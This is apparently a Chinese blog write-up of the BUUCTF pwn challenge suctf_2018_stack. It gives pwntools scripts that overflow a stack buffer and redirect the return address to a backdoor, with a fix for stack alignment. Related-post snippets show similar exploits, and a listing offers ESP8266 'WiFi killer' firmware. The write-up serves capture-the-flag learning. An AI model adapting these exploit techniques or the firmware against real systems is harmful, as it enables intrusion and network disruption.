[BUUCTF-pwn]——suctf_2018_stack

最新推荐文章于 2023-04-18 19:24:54 发布
最新推荐文章于 2023-04-18 19:24:54 发布
阅读量458 收藏 1
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114658231
版权

[BUUCTF-pwn]——suctf_2018_stack

什么保护都没开
在这里插入图片描述
在IDA中一查看,发现有点简单太简单了.本来刚开始以为溢出空间不够只有两个地址,一个epb, 一个返回地址, 可是结果仅仅返回地址就可以了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
exploit

from pwn import *
p = remote('node3.buuoj.cn',29819)

leave_ret = 0x0000000000400732
pop_rdi_ret = 0x00000000004007a3
ret_addr = 0x0400676
payload = 'a' * (0x20 + 8) + p64(ret_addr)
p.send(payload)
p.interactive()

结果发现想的有点简单, 这道题检查的其实是栈平衡的问题,因为是Ubuntu18
所以我们稍微改一次就好

exploit

from pwn import *
p = remote('node3.buuoj.cn',29819)

leave_ret = 0x0000000000400732
pop_rdi_ret = 0x00000000004007a3
ret_addr = 0x0400677 #0x0400678也是可以的,只要使得栈上少一个或者多一个数据就OK了
payload = 'a' * (0x20 + 8) + p64(ret_addr)
p.send(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 555
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
BUUCTF pwn——pwn1_sctf_2016
CNS-Enterprise BCC-1701-J
03-12 118
BUUCTF 做题练习
[BUUCTF-pwn]——inndy_echo
Y_peak的博客
03-29 523
[BUUCTF-pwn]——inndy_echo 有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。 从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。 先找找偏移 7 exploit from pwn import * p = remote("node3.buuoj.cn",28268) #p = process("./echo") #gdb.attach(p, "b printf
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 331
BUUCTF 做题练习
[BUUCTF-pwn]——hgame2018_flag_server
Y_peak的博客
04-03 365
[BUUCTF-pwn]——hgame2018_flag_server 保护开启了 NX和canary 看下反汇编,只要v10非0就可以得到flag, 也就是v6 = v8,但是显然v8是一个随机数, 并且没有找到可以修改的地方。 仔细观察上面的代码,一旦v5为负数,我们就可以无限输入了,并且s1距离v10为0x40 = 64, 我们只需要输入0x40个字符就可以开始修改v10了 exploit from pwn import * p = remote("node3.buuoj.cn",28128) p
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 299
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
[BUUCTF-pwn]——test_your_nc
Y_peak的博客
01-30 1125
BUUCTF——test_your_nc 题目地址:https://buuoj.cn/challenges 题目: 下载题目看看,在Linux上用,checksec test检查发现是64位的程序,并且没有开启canary。 在window上用IDA,反汇编看下源码。 啊这,啊这。打扰了,根本不需要做任何操作人家直接给你了,呜呜呜~~~。 所以wp也就很简单了 # test.py from pwn import * p = remote("ip地址",ip端口) #看看给你的服务端口是什么 p.int
BUUCTF(PWN)suctf_2018_stack
半岛铁盒的博客
04-03 276
from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐 ...
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1290
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3860
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3079
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 1935
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1787
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值